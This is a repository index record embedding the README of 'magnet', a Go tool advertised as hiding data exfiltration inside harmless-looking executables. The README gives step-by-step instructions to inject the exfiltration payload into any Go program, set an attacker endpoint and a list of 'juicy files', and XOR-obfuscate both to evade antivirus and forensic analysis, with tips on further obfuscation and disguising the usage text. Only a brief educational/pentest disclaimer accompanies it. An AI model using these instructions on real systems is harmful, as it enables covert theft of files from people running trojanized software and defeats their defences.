{"id":19544854,"url":"https://github.com/ariary/magnet","last_synced_at":"2025-04-26T19:31:48.089Z","repository":{"id":64308001,"uuid":"474954310","full_name":"ariary/magnet","owner":"ariary","description":"🧲 Hide data exfiltration in harmless looking executable","archived":false,"fork":false,"pushed_at":"2023-10-23T07:18:28.000Z","size":166,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T17:11:38.896Z","etag":null,"topics":["data-exfiltration","encryption","infosec","malware","pentest","pentest-tool"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-28T10:35:19.000Z","updated_at":"2024-03-06T01:50:14.000Z","dependencies_parsed_at":"2024-06-20T14:12:02.174Z","dependency_job_id":"ef1fceed-0e57-4811-8287-a786ffd1418a","html_url":"https://github.com/ariary/magnet","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/magnet/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041427,"owners_count":21527193,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["data-exfiltration","encryption","infosec","malware","pentest","pentest-tool"],"created_at":"2024-11-11T03:32:34.418Z","updated_at":"2025-04-26T19:31:47.761Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=center\u003e\n  \u003ch1\u003emagnet\u003c/h1\u003e\n  \u003cpre\u003e🧲⚡\n  Grab interesting files from target\u003c/strong\u003e\u003cbr\u003e\n\n  \u003cb\u003e\u003ci\u003eCross-platform\u003c/i\u003e\u003c/b\u003e\n  \u003cb\u003e\u003ci\u003eStealth\u003c/i\u003e\u003c/b\u003e\n  \u003cb\u003e\u003ci\u003ePortable\u003c/i\u003e\u003c/b\u003e  \n  \u003c/pre\u003e\n\u003c/div\u003e\n\nThe library is built to fetch predefined files of interest from a remote device. It assumes that an HTTP endpoint is listening when the program is launched.\n\n**Program execution on target will stealthy provide you the files you ask for.**\n\nYou have 2 possibilities:\n* [Hide exfiltration in your program](#-inject-magnet-in-your-go-program)\n* [Use the standalone `magnet` executable](#-standalone)\n\n\u003csup\u003e\u003ci\u003eFor educational purpose only or during pentest assessment with prior permission\u003c/i\u003e\u003c/sup\u003e\n\n## Usage\n\nAll the work is made **At compilation time**, you need to specify:\n* The ***remote endpoint***, where juicy files are uploaded\n* The ***Juicy files***, list of files you want to grab\n* The ***target os***, to fit the target (between: `windows`, `darwin`, `linux`)\n* The ***method*** uses for exfiltration (`http`, `tcp`)\n```shell\nexport KEY=[YOUR_KEY]\nexport FILES=[FILENAME]\nexport ENDPOINT=[ATTACKER_ENDPOINT]\nexport METHOD=[EXFILTRATION_METHOD]\n```\n\n### 🥷 Inject `magnet` in your Go program\n\n1. Add `magnet` import and declare variables outside your `main()` function:\n```golang\nimport \"github.com/ariary/magnet/pkg/magnet\"\n\nvar FileList,Key,Endpoint,Method string\n```\n\n2. Add magnet payload in the `main()`:\n```golang\n\tsender := magnet.InitMagnetSender(Method)\n\tmagnet.Magnet(sender, FileList, Endpoint, Key, debug)\n```\n\n3. Finally, modify the build command by adding `-ldflags \"-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'\"` and `CGO_ENABLED=0`\n\nsee [declare `magnet`environment variables](#declare-magnet-envar)\n\n### ⚡ Standalone\n\n\n\nTo build `magnet` binary in one step:\n```shell\n# ensure lobfuscator is in your PATH\n./build.sh $FILES $ENDPOINT $KEY $METHOD\n```\n\nSee [`lobfuscator`](#build-lobfuscator) and [full example](https://github.com/ariary/magnet/blob/main/examples/EXAMPLES.md)\n\n\n### Obfuscation/Encryption\n\nTo avoid detection systems, as we are seeking for sensitive files, **the different files we want to grab must not be in clear text within the binary** . Hence it used basic encryption with the key to decrypt embedded in binary. *(The aim is only to avoid AV and Detection system not to have strong encryption scheme)*\n\nThe same thing is made for the remote endpoints, to make the forensic analysis harder.\n\n`lobfuscator` is the simple tool to perform the XOR encryption/decryption.\n\nAn exemple to build the obfuscated list:\n```shell\ncat [FILE] | lobfuscator $KEY \u003e obfuscated.txt\n# decrypt: cat obfuscated.txt | lobfuscator -d $KEY\n```\n\n#### Build `lobfuscator`\n```shell\nmake build.lobfuscator\n```\n\n#### Declare `magnet` envar\n\nDefine `FILES` and `ENDPOINT` envar:\n```shell\nexport FILES=$(cat [FILE] | lobfuscator $KEY)\nexport ENDPOINT=$(echo \"[ENDPOINT]\" | lobfuscator $KEY)\n```\n\n\n#### Go further\n\nYou can also use `lobfuscator` without providing a key to encrypt (will generate a random key of the size of the input):\n```shell\n# Encrypt with random key\ncat samples/linux_juicy_files.txt | ./lobfuscator \u003e encrypted.txt 2\u003etmp.txt \u0026\u0026 cat tmp.txt | cut -d \":\" -f 2- \u003e keys.txt \u0026\u0026 rm tmp.txt\n# Decrypt using file containing keys\ncat encrypted.txt| ./lobfuscator -d -kf keys.txt\n``` \n## Notes\n\n* For the remote endpoint , I suggest you to use the `/push` endpoint of a [`gitar`](https://github.com/ariary/gitar) listener\n* The software is built to be stealthy hence:\n  * error handling is not verbose (hidden flag to get more verbosity `-thisisdebug`)\n  * I suggest to overwrite usage string in `magnet.go` to fit your attack scenario (for standalone use)\n* To enhance the binary obfuscation use [`garble`](https://github.com/burrowers/garble) to compile `magnet` instead of `go`(adapt `build.sh` consequently)\n\n## To do\n\n* Handle directories\n* Use other protocols to send files (ICMP, DNS, SMTP, etc...)\n* `magnetgentool` is on the making, it will be used with `//go:generate` comment to stealthy inject magnet code.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fmagnet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fmagnet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fmagnet/lists"}